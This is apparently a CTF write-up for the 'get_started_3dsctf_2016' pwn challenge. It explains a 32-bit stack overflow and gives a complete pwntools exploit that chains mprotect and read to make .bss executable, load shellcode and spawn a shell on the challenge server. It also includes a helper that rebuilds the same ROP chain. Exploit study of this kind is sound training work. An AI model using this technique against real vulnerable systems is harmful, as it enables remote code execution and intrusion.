Run checksec first.
To solve this challenge remotely we need to change memory permissions, which means calling mprotect; the binary does contain this function (it is statically linked).
This challenge is a bit special: there is no bp (frame pointer). The calling convention is cdecl and the stack is balanced through sp, so values are referenced by their offset from sp.
The padding is 0x38.
The general idea: find the addresses of mprotect, bss, read (to write the shellcode into bss) and a pop gadget (to pop mprotect's arguments off the stack so the second function call can be made), then pass the arguments.
int mprotect(void *addr, size_t len, int prot);
ssize_t read(int fd, void *buf, size_t count);
from pwn import *

context(log_level='debug', arch='i386', os='linux')
r = remote('node3.buuoj.cn', 28905)
#r = process('./get_started_3dsctf_2016')
elf = ELF('./get_started_3dsctf_2016')

bss = 0x080ea000            # page-aligned start of .bss, where the shellcode is written
mprotect_addr = 0x0806EC80  # mprotect() inside the static binary
read_addr = 0x0806E140      # read() inside the static binary
shell = asm(shellcraft.sh())
pop_3 = 0x080483b8          # pop esi ; pop edi ; pop ebp ; ret  (removes mprotect's 3 arguments)

# 0x38 bytes of padding, then: mprotect(bss, 0x2000, 7) -> pop_3 -> read(0, bss, 0x2000) -> return into bss
p = flat(['a'*0x38, mprotect_addr, pop_3, bss, 0x2000, 0x7, read_addr, bss, 0, bss, 0x2000])
r.sendline(p)
r.sendline(shell)  # consumed by read() into the now-RWX bss
r.interactive()
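As an added illustration of the cdecl chaining rule the payload above relies on (not code from the write-up), the following rebuilds the same stack layout from a list of calls and checks that every intermediate cleanup gadget pops exactly as many dwords as the preceding call took arguments; the addresses are the ones quoted above and are assumed, not re-verified here.

```python
import struct

# Addresses taken from the write-up above (static i386 binary); assumed as given.
MPROTECT = 0x0806EC80
READ     = 0x0806E140
BSS      = 0x080EA000
POP3_RET = 0x080483B8          # pop esi ; pop edi ; pop ebp ; ret
PADDING  = 0x38
# How many dwords each cleanup gadget removes from the stack before its ret.
GADGET_POPS = {POP3_RET: 3}

def cdecl_chain(calls):
    """Lay out chained cdecl calls for a 32-bit stack.

    calls: list of (func, args, after). When func returns, execution continues
    at 'after'. In cdecl the callee leaves its arguments on the stack, so for
    every call but the last, 'after' must be a pop-N ; ret gadget with
    N == len(args); otherwise the next function address would be consumed as an
    argument instead of being returned into. The last call's 'after' is just
    the address to land on once the chain is finished.
    """
    chain = []
    for i, (func, args, after) in enumerate(calls):
        is_last = i == len(calls) - 1
        if not is_last and GADGET_POPS.get(after) != len(args):
            raise ValueError(f"call #{i}: gadget {after:#x} must pop {len(args)} dwords")
        chain += [func, after, *args]
    return chain

def build_payload():
    """Same layout as the write-up: mprotect(bss, 0x2000, RWX), then read(0, bss, 0x2000), then jump to bss."""
    chain = cdecl_chain([
        (MPROTECT, [BSS, 0x2000, 0x7], POP3_RET),
        (READ,     [0, BSS, 0x2000],   BSS),
    ])
    return b"a" * PADDING + b"".join(struct.pack("<I", v) for v in chain)
```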